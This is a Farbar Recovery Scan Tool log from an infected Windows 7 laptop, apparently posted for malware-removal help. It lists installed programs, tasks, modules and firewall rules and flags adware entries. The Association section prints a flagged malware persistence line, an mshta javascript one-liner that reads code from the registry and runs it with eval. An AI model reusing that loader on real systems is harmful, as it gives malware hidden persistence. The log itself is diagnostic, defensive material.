2017-01-22 07:56 - 2009-07-13 20:45 - 00032064 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-01-22 07:53 - 2015-10-24 13:37 - 00000000 ____D C:\Users\Karen Laptop\Documents\Avery Templates
2017-01-22 07:53 - 2012-06-23 17:39 - 00000000 ____D C:\Users\Karen Laptop\Documents\Karen docs
2017-01-22 07:48 - 2012-06-20 17:54 - 00000000 ____D C:\Users\Karen Laptop\AppData\LocalLow\AuthenTec
2017-01-22 07:48 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-01-21 16:28 - 2016-08-22 16:47 - 00000892 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job
2017-01-01 12:51 - 2016-08-24 18:01 - 00000000 ____D C:\Program Files\McAfee Security Scan

==================== Files in the root of some directories =======

2016-08-16 05:09 - 2016-08-16 05:09 - 2225683 _____ () C:\Users\Karen Laptop\AppData\Roaming\sb279.dat
2016-08-16 05:09 - 2016-08-16 05:09 - 0229888 _____ () C:\Users\Karen Laptop\AppData\Roaming\Setup22240.exe
2014-04-20 09:45 - 2016-09-26 18:13 - 0000279 _____ () C:\Users\Karen Laptop\AppData\Roaming\WB.CFG
2016-07-31 07:19 - 2016-07-31 07:19 - 0000017 _____ () C:\Users\Karen Laptop\AppData\Local\resmon.resmoncfg

Some files in TEMP:
====================
2014-04-15 15:23 - 2014-04-15 15:23 - 0026424 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\DseShExt-x64.dll
2014-04-15 15:23 - 2014-04-15 15:23 - 0028472 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\DseShExt-x86.dll
2017-01-22 08:18 - 2017-01-22 08:18 - 0000272 _____ () C:\Users\Karen Laptop\AppData\Local\Temp\install_flash_player_24_active_x.exe
2014-04-15 15:23 - 2014-04-15 15:23 - 0032056 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\SDShelEx-win32.dll
2014-04-15 15:23 - 2014-04-15 15:23 - 0031544 _____ (AVG) C:\Users\Karen Laptop\AppData\Local\Temp\SDShelEx-x64.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-06-18 18:24

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-01-2017
Ran by Karen Laptop (22-01-2017 13:08:51)
Running from C:\Users\Karen Laptop\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2012-06-21 01:54:34)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3553682965-2478827086-665785291-500 - Administrator - Disabled)
Guest (S-1-5-21-3553682965-2478827086-665785291-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3553682965-2478827086-665785291-1004 - Limited - Enabled)
Karen Laptop (S-1-5-21-3553682965-2478827086-665785291-1000 - Administrator - Enabled) => C:\Users\Karen Laptop

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {2C040BB5-2B06-7275-5A21-2B969A740B4B}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.7.700.224 - Adobe Systems Incorporated)
Adobe Flash Player 22 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader X (10.1.16) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec TrueAPI (Version: 1.3.0.139 - AuthenTec, Inc.) Hidden
Avery Search App by Ask (HKLM-x32\...\{41565232-2D53-5000-76A7-A758B70C2D01}) (Version: 12.45.1.1180 - APN, LLC)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Citrix XenApp Web Plugin (HKLM-x32\...\{EBFEEB3F-3E3B-4725-A4E0-376144CE4F76}) (Version: 11.0.0.5357 - Citrix Systems, Inc.)
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4528 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E96CAA2A-0244-4A2A-8403-0C3C9534778B}) (Version: 2.1.1 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hoyle Card Games 4 (HKLM-x32\...\Hoyle Card Games 4) (Version: - )
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{BC6CB499-9F29-4B41-8B8B-FA7248525256}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Launch Box (HKLM\...\{BF1E75D0-E7AF-4BEA-9FBC-567F0C54BDF9}) (Version: 1.0.12 - Hewlett-Packard Company)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Power Manager (HKLM-x32\...\{E44578C7-4667-4124-8BC2-1161BCA54978}) (Version: 1.4.4 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{285F722C-0E45-47DE-B38E-5B3B10FA4A7C}) (Version: 2.5.2 - Hewlett-Packard Company)
HP QuickWeb (HKLM-x32\...\{BB4FC2AD-DF12-4EE1-8AA7-2C0A26B5E2FB}) (Version: 3.1.1.10197 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{562608FE-2051-4488-BF22-8CE4C03046AC}) (Version: 1.0.12 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15076.3891 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP SimplePass PE 2011 (HKLM-x32\...\{4741965C-AFD0-4D00-81D1-1039F96D4DC3}) (Version: 5.3.0.264 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{AF240B18-034B-4A82-B3FC-0B879C4BAE2E}) (Version: 4.5.1.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{6F44AF95-3CDE-4513-AD3F-6D45F17BF324}) (Version: 6.1.12.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6365.0 - IDT)
Image Converter (HKLM-x32\...\Image Converter Image Converter) (Version: 1.0.0 - Image Converter)
Image Editor Packages (HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Image Editor Packages) (Version: - ) <==== ATTENTION
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2476 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
iPad/iPhone/iPod to Computer Transfer 7.7.4 (HKLM\...\Cucusoft iPad/iPhone/iPod to Computer Transfer_is1) (Version: - Cucusoft, Inc.)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.474.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.0.1526.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Security Scan (HKLM-x32\...\NSS) (Version: 4.3.1.3 - Symantec Corporation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Palm Desktop (HKLM-x32\...\{4D8314D2-11FE-4397-A7CC-7015CFF50BCE}) (Version: 4.1.0300 - Palm, Inc.)
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
QuickTime (HKLM-x32\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
Quiknowledge (HKLM-x32\...\Quiknowledge) (Version: 1.9.0.3 - Quiknowledge) <==== ATTENTION
Ralink RT5390 802.11b/g/n WiFi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309B0}) (Version: 3.02.02.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.85 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
Scrabble Complete (HKLM-x32\...\{B36649A3-D0DD-4706-B042-F5B384529C7A}) (Version: - )
Skype™ 5.5 (HKLM-x32\...\{AA59DDE4-B672-4621-A016-4C248204957A}) (Version: 5.5.117 - Skype Technologies S.A.)
Speedial (HKLM-x32\...\Speedial) (Version: - Speedial) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics TouchPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.11.0 - Synaptics Incorporated)
The Treasures of Mystery Island: The Ghost Ship (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
VideoFileDownload (HKLM-x32\...\vfd-adk) (Version: 1.0 - VideoFileDownload)
VIP Access SDK (1.0.1.2) (HKLM-x32\...\VIP Access SDK) (Version: 1.0.1.2 - Symantec Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WebEx (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0666F0CF-98EA-4D09-A5A1-D550880A440A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-22] (Adobe Systems Incorporated)
Task: {1872D861-2690-4DCD-8ED0-78D12C72F814} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-28] (Google Inc.)
Task: {1E1BCA3B-250E-4267-87A4-9B59B52DCACB} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {7B53E4DC-D729-4556-8F48-3F0F691AB37C} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-09-28] (CyberLink)
Task: {811B9503-EF3E-4D44-BA82-8D702311B1BD} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-28] (Google Inc.)
Task: {8242DE3E-AF9F-4EE9-995E-A6B949FEADF3} - System32\Tasks\Norton Security Scan for Karen Laptop => C:\Program Files (x86)\Norton Security Scan\Engine\4.3.1.3\Nss.exe [2015-10-15] (Symantec Corporation)
Task: {8B8F93BF-D29B-4EED-90A3-7DA3C0E7EBB7} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_209_pepper.exe [2016-08-22] (Adobe Systems Incorporated)
Task: {A037F9F4-A25E-40C6-90B5-F721DEAEEDE5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {A2DD7DDE-83A0-4EEB-B0D9-5F178B89AF8F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [2011-06-14] (Hewlett-Packard)
Task: {B0A46419-7777-4ED4-8EAA-FDA404049F39} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {BFC5AEF7-FA4A-497F-A01D-AA552916C39F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {EF8AC5C0-D081-4734-887F-16316D91488F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {FEC6C83E-0EDC-49CC-8612-A15C49FE6920} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [2011-03-22] (Hewlett-Packard Company)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_209_pepper.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Norton Security Scan for Karen Laptop.job => C:\PROGRA~2\NORTON~2\Engine\431~1.3\Nss.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-08-26 11:53 - 2011-08-26 11:53 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2011-04-27 16:05 - 2011-04-27 16:05 - 01102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2014-07-31 11:16 - 2014-07-31 11:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 11:16 - 2014-07-31 11:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2011-04-27 16:05 - 2011-04-27 16:05 - 00514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2013-02-03 13:22 - 2013-02-03 13:22 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\fd7fa1aa086fc23a60b1536d346f5657\IsdiInterop.ni.dll
2011-12-12 00:31 - 2011-04-30 00:28 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2016-12-15 07:14 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 07:14 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2009-02-26 12:46 - 2009-02-26 12:46 - 00064344 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\ColleagueImport.dll
2011-06-22 10:46 - 2011-06-22 10:46 - 00434016 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\UmOutlookAddin.dll
2011-10-05 03:52 - 2011-10-05 03:52 - 00756048 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
2016-05-11 16:37 - 2015-07-29 23:50 - 01884672 _____ () C:\Users\Karen Laptop\AppData\Local\Chromium\Application\46.0.2470.0\libglesv2.dll
2016-05-11 16:37 - 2015-07-29 23:50 - 00075264 _____ () C:\Users\Karen Laptop\AppData\Local\Chromium\Application\46.0.2470.0\libegl.dll
2016-08-22 16:47 - 2016-08-22 16:47 - 17602240 _____ () C:\Windows\SysWOW64\Macromed\Flash\pepflashplayer32_22_0_0_209.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Classes\151f3: "C:\Windows\system32\mshta.exe" "javascript:L4vFGmby="e7O82";Pk0=new ActiveXObject("WScript.Shell");JufFXC5="YUb";C3lgb5=Pk0.RegRead("HKCU\\software\\qtdr\\feuqvieofe");uveV2="J";eval(C3lgb5);q1iVB="6IUEzjp";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2017-01-01 12:51 - 00000859 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1 mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Karen Laptop\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{538C8A6F-2738-4392-938B-1479906898B9}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{90155409-060E-4781-8DE7-00FC8A070157}] => C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{BBB3BF29-3E41-4C29-84E4-5146F00461DC}] => LPort=2869
FirewallRules: [{654F5E4C-448E-454E-8156-CABCB2543FF7}] => LPort=1900
FirewallRules: [{8988E108-CB44-46EE-BDE4-5B1DA6B37B45}] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{23B2DFB3-E1D2-46A4-B912-0174CDAEBB9F}] => C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{017A1DCA-F5BD-41BE-AB3C-F7B806C1492C}] => C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [TCP Query User{64269338-C5BF-4C51-B042-88BFEE0F5D18}C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe] => C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe
FirewallRules: [UDP Query User{1113966D-A15E-4736-B752-90D4CF7AF732}C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe] => C:\program files (x86)\infogrames interactive\scrabble complete\scrabblecomplete.exe
FirewallRules: [TCP Query User{583B9DAE-25A9-4990-9BB5-9619875A864F}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{D77F3AF3-1F3D-4502-A7DE-05C17614CF9D}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{D264833A-1D98-4DB7-B2F0-B73211B025A1}C:\program files (x86)\microsoft office\office12\groove.exe] => C:\program files (x86)\microsoft office\office12\groove.exe
FirewallRules: [UDP Query User{6CBE2596-21A0-4DBD-B1BB-D6B4AF15A091}C:\program files (x86)\microsoft office\office12\groove.exe] => C:\program files (x86)\microsoft office\office12\groove.exe
FirewallRules: [TCP Query User{351DB455-463F-4ED0-B54E-8CBBE36D73EA}C:\program files (x86)\palm\hotsync.exe] => C:\program files (x86)\palm\hotsync.exe
FirewallRules: [UDP Query User{8CE0FFEF-EA34-42D8-83E1-A0B5B4C29D61}C:\program files (x86)\palm\hotsync.exe] => C:\program files (x86)\palm\hotsync.exe
